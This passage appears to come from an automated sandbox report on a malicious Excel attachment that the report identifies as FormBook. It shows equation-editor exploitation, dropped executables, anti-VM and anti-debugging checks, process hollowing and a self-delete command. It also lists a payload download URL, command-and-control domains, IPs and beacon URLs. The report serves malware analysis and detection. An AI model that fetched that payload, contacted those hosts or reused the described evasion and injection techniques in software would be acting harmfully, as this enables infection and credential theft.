Source: C:\Users\Public\vbc.exe Code function: 4_2_0037B5DA push ebp; retf 4_2_0037B5DC
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041B2A2 push cs; ret 8_2_0041B2A3
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041B3F2 push eax; ret 8_2_0041B3F8
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041B3FB push eax; ret 8_2_0041B462
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041B3A5 push eax; ret 8_2_0041B3F8
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041B45C push eax; ret 8_2_0041B462
Source: C:\Users\Public\vbc.exe Code function: 8_2_00415414 push esp; ret 8_2_00415416
Source: C:\Users\Public\vbc.exe Code function: 8_2_00414F46 push cs; ret 8_2_00414F47
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041BF12 push dword ptr [8427D5C5h]; ret 8_2_0041C1FF
Source: C:\Users\Public\vbc.exe Code function: 8_2_00415FC5 push ebp; ret 8_2_00415FC6
Source: C:\Users\Public\vbc.exe Code function: 8_2_0093DFA1 push ecx; ret 8_2_0093DFB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A2DFA1 push ecx; ret 11_2_02A2DFB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_0009B2A2 push cs; ret 11_2_0009B2A3
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_0009B3A5 push eax; ret 11_2_0009B3F8
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_0009B3FB push eax; ret 11_2_0009B462
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_0009B3F2 push eax; ret 11_2_0009B3F8
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_00095414 push esp; ret 11_2_00095416
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_0009B45C push eax; ret 11_2_0009B462
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_0009BF12 push dword ptr [8427D5C5h]; ret 11_2_0009C1FF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_00094F46 push cs; ret 11_2_00094F47
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_00095FC5 push ebp; ret 11_2_00095FC6
Source: initial sample Static PE information: section name: .text entropy: 7.37315390636

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xele[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: APPROVED.xlsx Stream path 'EncryptedPackage' entropy: 7.99980853948 (max. 8.0)

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 3064, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 8_2_004088A0 rdtsc 8_2_004088A0
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2348 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2984 Thread sleep time: -103182s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3052 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 2064 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 103182 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000009.00000002.2349753135.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000000.2162338388.0000000004234000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000009.00000000.2162381993.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000009.00000000.2162175955.00000000041AD000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000009.00000000.2154806307.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 8_2_004088A0 rdtsc 8_2_004088A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 8_2_00409B10 LdrLoadDll, 8_2_00409B10
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 8_2_009426F8 mov eax, dword ptr fs:[00000030h] 8_2_009426F8
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A326F8 mov eax, dword ptr fs:[00000030h] 11_2_02A326F8
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 104.21.65.7 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 75.2.66.247 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 54.85.86.211 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 156.241.53.161 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.essentiallyourscandles.com
Source: C:\Windows\explorer.exe Domain query: www.brunoecatarina.com
Source: C:\Windows\explorer.exe Domain query: www.zmzcrossrt.xyz
Source: C:\Windows\explorer.exe Domain query: www.hfjxhs.com
Source: C:\Windows\explorer.exe Domain query: www.cyrilgraze.com
Source: C:\Windows\explorer.exe Domain query: www.zgcbw.net
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: DA0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: vbc.exe, 00000008.00000003.2203754103.0000000002730000.00000004.00000001.sdmp Binary or memory string: Proxy DesktopProgmanSoftware\Microsoft\Windows\CurrentVersion\RunOnce
Source: explorer.exe, 00000009.00000002.2349949941.00000000006F0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.2350379071.0000000001080000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000008.00000003.2203754103.0000000002730000.00000004.00000001.sdmp, explorer.exe, 00000009.00000002.2349949941.00000000006F0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.2350379071.0000000001080000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000002.2349753135.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000009.00000002.2349949941.00000000006F0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.2350379071.0000000001080000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 413096 Sample: APPROVED.xlsx Startdate: 13/05/2021 Architecture: WINDOWS Score: 100 51 www.myfavbutik.com 2->51 59 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->59 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 12 other signatures 2->65 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 38 23 2->15         started        signatures3 process4 dnsIp5 53 3.36.53.50, 49167, 80 AMAZONEXPANSIONGB United States 10->53 39 C:\Users\user\AppData\Local\...\xele[1].exe, PE32 10->39 dropped 41 C:\Users\Public\vbc.exe, PE32 10->41 dropped 75 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->75 17 vbc.exe 10->17         started        43 C:\Users\user\Desktop\~$APPROVED.xlsx, data 15->43 dropped file6 signatures7 process8 signatures9 55 Tries to detect virtualization through RDTSC time measurements 17->55 57 Injects a PE file into a foreign processes 17->57 20 vbc.exe 17->20         started        23 vbc.exe 17->23         started        25 vbc.exe 17->25         started        27 vbc.exe 17->27         started        process10 signatures11 67 Modifies the context of a thread in another process (thread injection) 20->67 69 Maps a DLL or memory area into another process 20->69 71 Sample uses process hollowing technique 20->71 73 Queues an APC in another process (thread injection) 20->73 29 explorer.exe 20->29         started        32 explorer.exe 20->32 injected process12 dnsIp13 77 Modifies the context of a thread in another process (thread injection) 29->77 79 Maps a DLL or memory area into another process 29->79 81 Tries to detect virtualization through RDTSC time measurements 29->81 35 cmd.exe 29->35         started        45 www.hfjxhs.com 156.241.53.161, 49168, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 32->45 47 www.cyrilgraze.com 104.21.65.7, 49172, 80 CLOUDFLARENETUS United States 32->47 49 8 other IPs or domains 32->49 83 System process connects to network (likely due to code injection or exploit) 32->83 85 Performs DNS queries to domains with low reputation 32->85 37 autofmt.exe 32->37         started        signatures14 process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
3.36.53.50
unknown United States
8987 AMAZONEXPANSIONGB true
104.21.65.7
www.cyrilgraze.com United States
13335 CLOUDFLARENETUS true
75.2.66.247
ytptranspx.xshoppy.shop United States
16509 AMAZON-02US true
54.85.86.211
www.brunoecatarina.com United States
14618 AMAZON-AESUS true
156.241.53.161
www.hfjxhs.com Seychelles
136800 XIAOZHIYUN1-AS-APICIDCNETWORKUS true
23.227.38.74
shops.myshopify.com Canada
13335 CLOUDFLARENETUS true

Private

IP
192.168.2.255

Contacted Domains

Name IP Active
www.brunoecatarina.com 54.85.86.211 true
www.myfavbutik.com 104.21.15.16 true
www.hfjxhs.com 156.241.53.161 true
www.cyrilgraze.com 104.21.65.7 true
shops.myshopify.com 23.227.38.74 true
ytptranspx.xshoppy.shop 75.2.66.247 true
www.zmzcrossrt.xyz unknown unknown
www.zgcbw.net unknown unknown
www.essentiallyourscandles.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.essentiallyourscandles.com/p2io/?6lzd4R3=tOwaJovwNhipp7Qdg3+vLu8KpTdHs2Vuljr6rtQHuYg94Ec45hj5yUBja0PUcN+7an3hSw==&Mj=8pGl2P true
  • Avira URL Cloud: safe
unknown
http://www.cyrilgraze.com/p2io/?6lzd4R3=PONkgH6JO+VmGu/vZj4YyU3gBn/U0y1OFS1Y8BXnr3YdY2x3tUozsPT0NTVR3XOxnye2KQ==&Mj=8pGl2P true
  • Avira URL Cloud: safe
unknown
http://3.36.53.50/dose/xele.exe true
  • Avira URL Cloud: safe
unknown